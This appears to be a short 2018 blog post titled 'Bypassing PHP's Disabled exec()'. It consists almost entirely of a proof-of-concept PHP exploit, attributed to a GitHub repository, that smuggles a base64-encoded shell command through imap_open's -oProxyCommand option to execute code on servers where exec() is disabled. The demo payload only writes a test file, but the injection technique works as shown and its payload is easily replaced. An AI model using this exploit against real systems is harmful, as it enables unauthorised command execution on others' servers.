Posts

Showing posts from November, 2018

Bypassing PHP’s Disabled exec()

Source: https://github.com/Bo0oM/PHP_imap_open_exploit
<?php # https://antichat.com/threads/463395/#post-4254681 # echo '1234567890'>/tmp/test0001 $server="x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; imap_open('{'.$server.':143/imap}INBOX', '', '') ordie("\n\nError: ".imap_last_error()); ?>